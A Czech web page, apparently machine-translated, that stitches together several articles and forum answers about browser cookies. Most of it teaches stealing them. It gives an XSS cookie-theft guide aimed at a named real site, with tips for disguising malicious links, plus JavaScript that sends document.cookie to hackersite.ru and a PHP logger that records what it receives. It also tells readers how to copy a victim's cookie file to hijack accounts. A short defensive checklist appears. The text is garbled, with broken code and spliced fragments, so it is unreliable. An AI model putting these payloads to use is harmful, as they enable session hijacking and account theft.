Můj přítel zapomněl heslo k jednomu webu. Předtím však při přihlašování zaškrtl políčko „Zapamatovat si mě“. Prohlížeč Google Chrome, který mu umožnil přihlásit se na stránky pod svým účtem. Byl jsem dotázán, zda lze tento magický stav přenést do jiného počítače. Správnější by samozřejmě bylo heslo změnit nebo obnovit, ale známý to nemohl udělat z důvodů nesouvisejících s případem.

Jak používat intercepter-ng pro figuríny

Navzdory rozmanitosti výběru moderního softwaru je obtížné najít programy pro hackování pro Android lepší než intercepter ng. Prvním kritériem ve prospěch tohoto produktu je jeho skutečný výkon. Většina navrhovaných snifferů v síti je pouze napodobenina, která neplní deklarované funkce.

Dalšími pozitivními faktory jsou všestrannost aplikace a pokrytí širokého okruhu uživatelů.

Počítačová nápověda 939-29-71

Začněme popořadě. Cookies neboli „cookies“ jsou velmi malé textové soubory – záložky s informacemi.

Webový server odešle tyto informace do prohlížeče uživatele. kde jsou tyto informace uloženy, dokud nejsou vyžadovány. Ne zcela jasné. Studna. OK.

Pokusím se to ještě zjednodušit. Vidět. jste se zaregistrovali na jakékoli stránce.

V okamžiku registrace se vytvářejí právě tyto „cookies“.

Zde jsou.

Cookie Cadger

Program naslouchá provozu na WiFi síti, zachycuje cookies a replikuje relaci uživatele ve vašem prohlížeči, přičemž opakuje požadavky s jeho přihlašovacími údaji. Autor Matthew Sullivan představil program 30. září na hackerské konferenci Derbycon. Přímo během projevu zachytil Matthew Sullivan přes WiFi nezabezpečenou relaci s Googlem jednoho z účastníků konference.

Jak ukrást cookies

Pokud na stránce webu vstoupíte do adresní řádek Prohlížeč Firefox nebo Opera následující text: javascript:document.write(document.cookie); uvidíte něco jako: remixAdminsBar=0; remixGroupType=0; remixpass=*************************; remixwall=0; remixInformation=0; remixMembersBar=0; popis remixu=0; remixautobookmark=8; remixemail=********; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Pozor! .

Kompletní průvodce skriptováním napříč weby

XSS je typ zranitelnosti software, nativní pro webové aplikace, které útočníkovi umožňuje vložit skript na straně klienta do webových stránek prohlížených jinými uživateli Wikipedia má pro XSS následující definici: „Skriptování mezi stránkami (XSS) je typ softwarové zranitelnosti nativní pro webové aplikace (od prohlížeč obcházení bezpečnostních omezení), který útočníkovi umožňuje vložit skript na straně klienta do webových stránek prohlížených jinými uživateli.

Rozdíl mezi soubory cookie a relacemi

Není to tak dávno, co jsem napsal článek o tom, jak registrovat a autorizovat uživatele na webu.

". V tomto článku rozeberu rozdíl mezi relacemi a soubory cookie. k vaší konečné volbě.

Soubory cookie. Ne, nejde o cookies, jde o vaši bezpečnost. Přejdete tedy na svůj oblíbený web „vkontakte“ (nebo se například podíváte na poštu) na počítači někoho jiného, ​​odmítnete možnost „uložit heslo“, s radostí si prohlédnete poštu a odejdete. A nemyslete na to, že pod svým jménem nyní můžete jít sociální síť nebo poštou.

Ani neberu v úvahu situaci programu, který si pamatuje heslo, aniž byste to věděli. To už je záměrný hack a nejspíš budete tušit, že se něco takového může stát a na svůj oblíbený web na takovém počítači nepůjdete. Ale můžeme hovořit o prosté lidské zvědavosti – byli jsme na návštěvě u přátel a pak znovu a oni dostali příležitost přečíst si vaši poštu. Jste si jisti, že takovou příležitost odmítnou? Nebojíte se, že se něco objeví? V každém případě nechám otázky morálky stranou a budu mluvit jen o tom, jak jsou v počítači uloženy informace, které vás nyní mohou pustit na nějaké stránky, aniž byste požadovali heslo.

jak ukrást cookies

A název této technologie je cookies.

A tady to všechno začalo. Protokol http, na kterém ve skutečnosti prohlížíte stránky (včetně této), zpočátku neznamenal možnost udržování připojení. To znamená, že zhruba řečeno odešlete na stránku požadavek, dostanete odpověď, zobrazí se na obrazovce a server si o vás nic nepamatuje. To je samozřejmě dobré, když je stránka čistě informační a neměla by si o vás nic pamatovat, ale žijeme ve věku Web 2.0 😉 Přirozeným vývojem protokolu jsou požadavky POST a GET, kdy odešlete nějaká data, server může zapsat je do databázových dat, ale to nestačí.

Podívejme se na velmi jednoduchý příklad. Fórum. Tak jste se zaregistrovali a na fóru je záznam, že existuje takový a takový uživatel s takovým a takovým heslem a nějakými dalšími doplňujícími údaji. Ale teď jděte do fóra a přihlaste se - zadejte své heslo. Někde by měla být informace, že jste přihlášeni. Na serveru? Samozřejmě že ne! Na server nelze uložit informaci, že autorizace byla provedena z vašeho počítače – nebude vás schopen odlišit od někoho jiného (dokonce ani vaše IP adresa vás jednoznačně neidentifikuje)! Informace o tom, že došlo k autorizaci, musí být tedy uloženy ve vašem počítači. K tomu jsou cookies, k tomu byly stvořeny.

Cookie je malý záznam ve vašem počítači, který ukládá informace o webu, který jste navštívili. Po autorizaci se vytvoří podobný záznam, po kterém už můžete fórum procházet a ono vás pozná. K tomu však již dojde automaticky – díky informacím uloženým v cookie – takže předstírání, že jste hlavním administrátorem fóra, stejně nebude fungovat a obejít ověření hesla.

Nyní se můžeme vrátit tam, kde tento článek začal. Pokud jste se někam přihlásili, aniž byste si uložili heslo, může se stát, že na počítači byl vytvořen záznam, který vám nyní umožňuje vstoupit do tohoto zdroje pod vaším jménem bez oprávnění. Takový záznam sám o sobě po chvíli zastará, ale můžete si jej vynutit. Každý prohlížeč to dělá jinak, ukážu vám, jak to udělat v mém oblíbeném Google Chrome. Otevření možností

Přejděte na kartu „pokročilé“ a najděte tlačítko „zobrazit soubory cookie“.

Nyní samozřejmě můžete smazat všechny cookies, ale to může naštvat vlastníka počítače. Proto například do horního pole můžete zadat název webu, který vás zajímá

Poté lze vymazat pouze soubory cookie související s tímto webem. Můžeš zkusit můj. Navíc, pokud se přihlásíte do mého fóra a poté vymažete soubory cookie, informace o autorizaci budou zapomenuty. Zkus to!

komentáře poháněné

1. Co je XSS
Chyba zabezpečení typu XSS umožňuje vložení libovolného kódu javascriptu do těla stránky. XSS útok se liší od ostatních (např. SQL injection nebo PHP injection) tím, že nepůsobí na server, ale na klienta.

jak ukrást cookies

S jeho pomocí nemůžete prohlížet databázové tabulky, nahrávat shell atd. Nejběžnějším využitím XSS je krádež cookies.
Cookies (Cookies) – malý kus dat vytvořený webovým serverem a uložený v počítači uživatele jako soubor. Soubory cookie se obvykle používají k ukládání účtů a nejčastěji obsahují zakódované heslo, přihlašovací jméno a ID relace. (i když ne vždy)
XSS jsou dvou typů, aktivní a pasivní.

Pasivní XSS vyžadovat přímou účast oběti, například následovat odkaz obsahující kód javascriptu. Při použití tohoto typu XSS se neobejdete bez SI (Social Engineering)

Aktivní XSS nevyžadují žádnou účast oběti, stačí jí přejít na stránku s XSS. Aktivní XSS může být například v příspěvcích na fóru, chatech, v přidávání novinek atd.

2.Vyhledejte XSS
V tomto odstavci vám řeknu, jak najít xss

2.1 Pasivní XSS
Chcete-li najít pasivní XSS, stačí nahradit ve vstupním formuláři pokud skript fungoval a objevila se zpráva „xss“, pak je zranitelnost přítomna, pokud skript nefungoval, můžete to zkusit ">, jedná se pravděpodobně o nejběžnější chybu zabezpečení xss. Pokud nefungoval ani jeden, ani druhý skript, pak s největší pravděpodobností neexistuje žádná zranitelnost.
Podívejme se na příklad.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
Vidíte formulář pro vyhledávání? vložte tam "> a klikněte na "najít"
Vyletělo okno s xss, což znamená, že xss je přítomno. (Možná v době, kdy čtete tento článek, bude toto xss již opraveno)

2.2 Aktivní XSS
Takové CSS může být například v polích profilu, při přidávání novinek v názvu novinky a v aktualitě samotné (méně často), ve zprávách na fórech / chatech / návštěvních knihách s povoleným html. Zde je vše jednoduché, do polí zadáme skript z předchozího pododstavce a pokud se zpráva zobrazí na obrazovce, pak je zranitelnost přítomna.
Zvažte xss v BB tagech na fórech.
můžete zkusit hloupě vložit kód javascriptu do značky takto:
javascript:alert('xss')
Některé značky mají parametry, například značka má parametry dynsrc a lowsrc, zkusme nahradit kód takto:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
Pokud skript fungoval, xss je

3.Užití XSS ke krádeži cookies
Nyní to nejchutnější
Abychom mohli ukrást cookies, potřebujeme webový sniffer, můžete si na svůj hosting nainstalovat nějaký sniffer, nebo můžete použít online sniffer, které jsou nyní plné.
Aby oběť ukradla soubory cookie prostřednictvím pasivního XSS, musí následovat jedovatý odkaz. Ke krádeži cookies použijeme místo toho další skript:
nahradíme skript v odkazu a necháme oběť, aby ho následovala, podívejte se na záznam sniffer a radujte se.
Podívejme se na příklad.
Vezměme si ten XSS na rambleru z předchozího odstavce.
Vložit
">
ve vyhledávacím formuláři klikněte na „najít“, podívejte se do adresního řádku a uvidíte:

http://miss.rambler.ru/srch/?sort=0& … &words =">
Tento odkaz hodíme oběti a užíváme si sušenky.
Když oběť vidí takový odkaz, může něco tušit, takže je vhodné kódovat
">
v URL Nebo použijte služby jako http://tinyurl.com/
Přejděme k aktivnímu XSS, zde je vše jednoduché, místo alert() vložíme img = new Image(); img.src = "adresa obrázku sniffer"+document.cookie;

Nyní máme sušenky. Ale co s nimi dělat? Je to jednoduché, musí být nahrazeny jejich vlastními. V Prohlížeč Opera je tam vestavěný editor souborů cookie (nástroje-> pokročilé-> správa souborů cookie), existuje plugin pro firefox (nepamatuji si název, použijte google)
To je zatím vše, snad bude článek doplněn

Na otázku Jak získat COOKIES cookies. Potřebuji cookies, jak je získat, prosím, řekněte mi!!! 1 sada od autora Vlad eeEEeeeeeeeeee nejlepší odpověď je Co jsou cookies?
Faktem je, že v procesu vývoje www-technologií a zavádění programovacích jazyků na internetu vyvstal před vývojáři programů velmi vážný problém - jak uložit výsledky provádění algoritmu pro každého konkrétního uživatele na na dlouhou dobu? Protokol HTTP sám o sobě nemá schopnost zachytit výsledky softwarových procesů. Použití relací také není řešením problému, protože jejich akce je ukončena okamžitě po přerušení spojení se serverem.
Problém byl vyřešen zavedením mechanismu cookies (tedy v překladu z angličtiny „cookies“). Cookies mají pozoruhodnou vlastnost – ukládají se na pevný disk uživatele a lze je tam ukládat téměř neomezeně dlouho.
Soubory cookie jsou ve svém jádru prosté textové soubory uložené ve speciálním adresáři používaném prohlížečem (obvykle nazývaném Temporary Internet Files) a můžete je zobrazit tak, že přejdete do tohoto adresáře ( rychlý přístup k tomu pro prohlížeč IE se provádí přes položky nabídky Nástroje -> Možnosti Internetu -> Dočasné soubory Internetu -> Nastavení -> Zobrazit
Některé soubory cookie lze uložit pouze pro jednu relaci, po zavření prohlížeče se smažou. Jiné, nastavené na určitou dobu, se zapisují do souboru. Obecně se tento soubor nazývá „cookies.txt“ (ale může jich být několik) a nachází se v pracovním adresáři prohlížeče nainstalovaného v počítači.
jinými slovy
Cookie je malá textová informace, kterou server odesílá prohlížeči. Cookies samy o sobě nemohou nic dělat, ale když uživatel přistoupí na server (zadá jeho adresu do řádku prohlížeče), server může číst informace obsažené v cookies a na základě své analýzy provádět jakékoli akce. Například v případě autorizovaného přístupu k něčemu přes web se přihlašovací jméno a heslo během relace ukládají do cookies, což uživateli umožňuje, aby je znovu nezadával při požadavku na každý dokument chráněný heslem.
Pokud se snažíte přes toto téma získat přístup k cizím heslem chráněným účtům, pak musíte najít cestu vzdáleně (trojský kůň) nebo drzým kopírováním na flash disk, pokud máte přístup k počítači, kde oběť pracuje, zkopírujte tento soubor cookie.txt a nahraďte jej ve svém (stejném) prohlížeči. Poté přejdete na požadovanou stránku, kde je účet, o který máte zájem, a automaticky získáte přístup. Mějte však na paměti, že pokud oběť na konci práce stiskne výstup z účtu (například z pošty), informace o relaci budou v souborech cookie vymazány a nezískáte žádný přístup.
Mozilla Firefox ukládá cookies do uživatelského profilu, do souboru C:Documents and SettingsUsernameApplication DataMozillaFirefoxProfiles<имя профиля>cookies.txt
nternet explorer ukládá tyto soubory cookie jako samostatné textové soubory do složky C:Documents and SettingsUsernameCookies
Opera ukládá cookies do souboru C:Documents and SettingsUsernameApplication DataOperaOperaprofilecookies4.dat

Soubory cookie - informace ve formě textového souboru, uložené webem na počítači uživatele. Obsahuje autentizační údaje (login/heslo, ID, telefonní číslo, adresa poštovní schránka), uživatelská nastavení, stav přístupu. Uloženo v profilu prohlížeče.

Cookie hack je krádež (nebo "unesení") návštěvníkovy relace na webový zdroj. Tajné informace se zpřístupní nejen odesílateli a příjemci, ale také třetí straně – osobě, která odposlouchávala.

Nástroje a techniky pro hackování souborů cookie

Počítačoví zloději, stejně jako jejich kolegové v reálném životě, mají kromě dovedností, šikovnosti a znalostí samozřejmě i vlastní nástroje – jakýsi arzenál generálních klíčů a sond. Pojďme se seznámit s nejoblíbenějšími triky hackerů, kterými vyloví z obyvatel internetu cookies.

Čichači

Speciální programy pro sledování a analýzu síťového provozu. Jejich název pochází z anglického slovesa „sniff“ (sniff), protože. doslova „vyčuhovat“ přenášené pakety mezi uzly.

Útočníci však používají sniffer k zachycení dat relace, zpráv a dalších důvěrná informace. Objektem jejich útoků jsou většinou nezabezpečené sítě, kam se cookies odesílají v otevřené HTTP relaci, tedy prakticky nejsou šifrované. (Veřejné Wi-Fi je nejzranitelnější.)

K zavedení snifferu do internetového kanálu mezi hostitelem uživatele a webovým serverem se používají následující metody:

  • "naslouchání" síťovým rozhraním (huby, přepínače);
  • větvení a kopírování provozu;
  • připojení k přerušení síťového kanálu;
  • analýzu pomocí speciálních útoků, které přesměrovávají provoz obětí na sniffer (MAC-spoofing, IP-spoofing).

Zkratka XSS znamená Cross Site Scripting. Používá se k útokům na webové stránky s cílem ukrást uživatelská data.

XSS funguje následovně:

  • útočník vloží škodlivý kód (speciální skrytý skript) na webovou stránku webu, fóra nebo do zprávy (například při chatování na sociální síti);
  • oběť navštíví infikovanou stránku a aktivuje se nastavit kód na vašem PC (klikne, následuje odkaz atd.);
  • aktivovaný škodlivý kód naopak „extrahuje“ důvěrná data uživatele z prohlížeče (zejména soubory cookie) a odešle je na webový server útočníka.

Aby hackeři „implantovali“ softwarový XSS mechanismus, využívají nejrůznější zranitelnosti webových serverů, online služeb a prohlížečů.

Všechny zranitelnosti XSS jsou rozděleny do dvou typů:

  • Pasivní. Útok je získán dotazem na konkrétní skript webové stránky. Škodlivý kód lze zadávat v různých formách na webové stránce (například do vyhledávacího pole na webu). Nejnáchylnější na pasivní XSS jsou zdroje, které nefiltrují HTML tagy, když dorazí data;
  • Aktivní. Nachází se přímo na serveru. A aktivují se v prohlížeči oběti. Aktivně je využívají podvodníci v různých blozích, chatech a zpravodajských kanálech.

Hackeři pečlivě „kamuflují“ své XSS skripty, aby oběť nic netušila. Změní příponu souboru, vydávají kód za obrázek, motivují je ke sledování odkazu, přitahují zajímavým obsahem. Výsledkem je, že uživatel PC, který se nevyrovnal se svou vlastní zvědavostí, odešle vlastní rukou (kliknutím myši) soubory cookie relace (s přihlašovacím jménem a heslem!) autorovi skriptu XSS - počítačovému padouchovi.

Spoofing cookies

Všechny cookies jsou ukládány a odesílány na webový server (ze kterého „přišly“) bez jakýchkoli změn – ve své původní podobě – se stejnými hodnotami, řetězci a dalšími údaji. Záměrná úprava jejich parametrů se nazývá cookie spoofing. Jinými slovy, když je cookie podvržena, útočník si přeje. Například při platbě v internetovém obchodě se částka platby v cookie změní na menší stranu - dochází tak k „úspoře“ na nákupech.

Ukradené soubory cookie relace na sociální síti z účtu někoho jiného se „vloží“ do jiné relace a na jiný počítač. Majitel ukradených cookies obdrží plný přístup na účet oběti (korespondence, obsah, nastavení stránky), pokud je na její stránce.

„Úprava“ cookies se provádí pomocí:

  • funkce "Spravovat cookies ..." v prohlížeči Opera;
  • doplňky Cookies Manager a Advanced Cookie Manager pro FireFox;
  • nástroje IECookiesView (pouze pro Internet Explorer);
  • textový editor jako AkelPad, NotePad nebo Windows Poznámkový blok.

Fyzický přístup k datům

Vysoce jednoduchý obvod implementace se skládá z několika kroků. Ale to je účinné pouze v případě, že počítač oběti s otevřené sezení, například Vkontakte, je ponechán bez dozoru (a na poměrně dlouhou dobu!):

  1. Zadejte do adresního řádku prohlížeče funkce javascript, která zobrazuje všechny uložené soubory cookie.
  2. Po stisknutí "ENTER" se všechny objeví na stránce.
  3. Soubory cookie se zkopírují, uloží do souboru a poté se přenesou na flash disk.
  4. Na jiném PC se soubory cookie nahrazují v nové relaci.
  5. Otevře se přístup k účtu oběti.

Hackeři zpravidla používají výše uvedené nástroje (+ další) jak v kombinaci (protože úroveň ochrany u mnoha webových zdrojů je poměrně vysoká), tak samostatně (když jsou uživatelé příliš naivní).

XSS + čichač

  1. Vytvoří se XSS skript, který specifikuje adresu online snifferu (vlastní produkce nebo konkrétní služby).
  2. Škodlivý kód je uložen s příponou .img (formát obrázku).
  3. Poté je tento soubor nahrán na stránku webu, chat nebo osobní zprávu - kde bude útok proveden.
  4. Pozornost uživatele upoutá vytvořená „past“ (zde vstupuje do hry sociální inženýrství).
  5. Pokud „past“ funguje, sniffer zachytí soubory cookie z prohlížeče oběti.
  6. Cracker otevře protokoly snifferu a vyjme ukradené sušenky.
  7. Poté provede náhradu za získání práv vlastníka účtu pomocí výše uvedených nástrojů.

Ochrana souborů cookie před hackováním

  1. Použijte šifrované připojení (pomocí vhodných protokolů a metod zabezpečení).
  2. Nereagujte na pochybné odkazy, obrázky, lákavé nabídky k seznámení s „novým svobodným softwarem“. Zejména od cizích lidí.
  3. Používejte pouze důvěryhodné webové zdroje.
  4. Ukončete autorizovanou relaci stisknutím tlačítka "Odhlásit" (a nejen zavřením karty!). Zvláště pokud účet nebyl přihlášen pomocí osobní počítač, ale např. z PC v internetové kavárně.
  5. Nepoužívejte funkci "Uložit heslo" vašeho prohlížeče. Uložená registrační data občas zvyšují riziko krádeže. Nebuďte líní, nenechte si pár minut času na zadání hesla a přihlášení na začátku každé relace.
  6. Po procházení webu – návštěvě sociálních sítí, fór, chatů, stránek – smažte uložené soubory cookie a vymažte mezipaměť prohlížeče.
  7. Pravidelně aktualizujte prohlížeče a antivirový software.
  8. Používejte rozšíření prohlížeče, která chrání před útoky XSS (například NoScript pro FF a Google Chrome).
  9. Pravidelně na účtech.

A hlavně – neztrácejte ostražitost a pozornost při odpočinku nebo práci na internetu!

Co je to cookie?

Existuje mechanismus, který umožňuje http serveru některé ukládat na počítač uživatele textové informace a pak ji kontaktovat. Tato informace tzv. cookie. Ve skutečnosti je každý soubor cookie pár: název parametru a jeho hodnota. Každému cookie je také přiřazena doména, ke které patří. Z bezpečnostních důvodů má ve všech prohlížečích http server povolen přístup pouze ke svému vlastnímu doménovému cookie. Soubory cookie mohou mít navíc datum vypršení platnosti, v takovém případě budou uloženy v počítači do tohoto data, i když budou všechna okna prohlížeče zavřená.


Proč jsou soubory cookie důležité?

Ve všech systémech pro více uživatelů se k identifikaci uživatele používají soubory cookie. Nebo spíše aktuální spojení uživatele se službou, uživatelská relace. Pokud někdo pozná vaše soubory cookie, může se vaším jménem přihlásit. Protože v tento moment velmi málo internetových zdrojů kontroluje změnu IP adresy během jedné uživatelské relace.


Jak změnit nebo změnit soubory cookie?

Vývojáři prohlížečů neposkytují vestavěné nástroje pro úpravu souborů cookie. Ale vystačíte si s běžným poznámkovým blokem (notepadem).


Krok 1: vytvořte textový soubor s textem

Okna Editor registru Verze 5.00



@="C:\\IE_ext.htm"

Uložíme jej pod názvem IE_ext.reg

Krok 2: Pomocí vytvořeného souboru přidejte změny do registru Windows.

Krok 3: vytvořte textový soubor s textem

< script language="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
alert(externí.menuArgumenty.dokument.cookie);


Uložte jej jako C:\IE_ext.htm

Krok 4: Přejdeme na webovou stránku, která nás zajímá.

Krok 5: Klikněte pravým tlačítkem myši klikne myší na volný prostor stránku a vyberte položku nabídky "Práce s cookies". Povolit přístup do schránky. Vaše soubory cookie pro tento web budou umístěny do schránky. Můžete vložit jejich poznámkový blok (notepad) a uvidíte.


Krok 6: Chcete-li změnit některé soubory cookie, upravte soubor C:\IE_ext.htm a nahraďte jej testovací jméno ve jménu cookie, zkušební hodnota- o jeho významu, testdomena.com- na doménu webu. V případě potřeby přidejte další podobné řádky. Pro usnadnění kontroly jsem do skriptu před a po změně přidal výstup aktuálních souborů cookie: alert(externí.menuArgumenty.dokument.cookie);

Krok 7: Spusťte znovu krok 5 a poté obnovte stránku.

Sečteno a podtrženo: přejdeme na tento internetový zdroj s aktualizovanými soubory cookie.

Jak ukrást soubory cookie pomocí JavaScriptu?

Pokud se útočníkovi podařilo najít příležitost ke spuštění libovolného skriptu JavaScript na počítači oběti, čtěte aktuální soubory cookie může velmi snadno. Příklad:


varstr=document.cookie;

Bude je však moci přenést na svůj web, protože, jak jsem již dříve uvedl, skript JavaScript nemůže dodatečné potvrzení přistupovat na stránky umístěné v jiné doméně? Ukázalo se, že skript JavaScript může načíst jakýkoli obrázek umístěný na libovolném http serveru. Zároveň do tohoto obrázku přeneste případné textové informace v požadavku na stažení. Příklad: http://hackersite.ru/xss.jpg?text_info Pokud tedy spustíte tento kód:

varimg= nový vzhled();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(dokument.cookie);


pak budou soubory cookie v žádosti o stažení „obrázku“ a „přenechání“ útočníkovi.

Jak takové žádosti o nahrání „obrázku“ řešit?

Útočníkovi stačí najít hosting s podpora php a umístěte kód takto:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Poté budou všechny parametry dotazu tohoto skriptu uloženy do souboru log.txt. Zbývá nahradit pouze v dříve popsaném skriptu JavaScript http://hackersite.ru/xss.jpg na cestu k tomuto php skriptu.


Výsledek

Ukázal jsem pouze nejjednodušší způsob, jak využít zranitelnosti XSS. Dokazuje to však, že přítomnost alespoň jedné takové chyby zabezpečení na internetovém webu pro více uživatelů může útočníkovi umožnit používat jeho zdroje vaším jménem.

Opera otevřete hlavní nabídku, přejděte do sekce "Nastavení" a vyberte řádek " Obecné nastavení......". A můžete jen horko stisknout klávesy CTRL+ F12. Tím se otevře okno nastavení prohlížeče, kde na záložce "Upřesnit" musíte kliknout na sekci "Cookies" v levém podokně. V něm musíte kliknout na tlačítko „Spravovat soubory cookie“.

V Mozilla Firefox otevřete v nabídce sekci "Nástroje" a vyberte položku "Nastavení". V okně nastavení musíte přejít na kartu „Ochrana osobních údajů“, najít tam tlačítko s nápisem „Zobrazit soubory cookie ...“ a kliknutím na něj otevřít seznam souborů cookie uložených prohlížečem. Zde je lze vyhledávat a prohlížet.

V aplikaci Internet Explorer rozbalte v nabídce sekci „Nástroje“ a vyberte „Vlastnosti“. V okně nastavení vlastností přejděte na kartu Obecné a v části Historie procházení klikněte na tlačítko Možnosti. Tímto způsobem otevřete další okno („Možnosti dočasného souboru“), ve kterém musíte kliknout na tlačítko „Zobrazit soubory“.

Klikněte na záhlaví "Název" v seznamu obsahu složky dočasných souborů aplikace Internet Explorer, která se otevře - tímto způsobem můžete seskupit všechny soubory cookie do jednoho bloku ve společné hromadě heterogenních souborů. Zde můžete najít požadovaný soubor a otevřít jej ve standardním Poznámkovém bloku pro prohlížení nebo úpravy.

V prohlížeči Google Chrome klikněte na ikonu klíče v pravém horním rohu okna a z nabídky vyberte Možnosti. Prohlížeč otevře stránku „Nastavení“ a vy klikněte na odkaz „Upřesnit“ v jeho levém podokně a na stránce pokročilých nastavení klikněte na tlačítko „Nastavení obsahu“. To ještě není poslední stránka na cestě k souborům cookie uloženým tímto prohlížečem.

Klikněte na tlačítko „Všechny soubory cookie a data stránek“ na další stránce a konečně budete mít přístup k seznamu souborů cookie.

Google Chrome poskytuje možnost vyhledávat, zobrazovat a mazat soubory cookie.

V prohlížeči Safari klikněte na ikonu ozubeného kola vpravo horním rohu a vyberte řádek "Nastavení ...". V okně pro změnu nastavení musíte přejít na kartu „Zabezpečení“, abyste zde klikli na tlačítko „Zobrazit soubory cookie“. Safari poskytuje pouze funkce pro vyhledávání a mazání cookies, obsah těchto dočasných souborů je zde vidět jen částečně.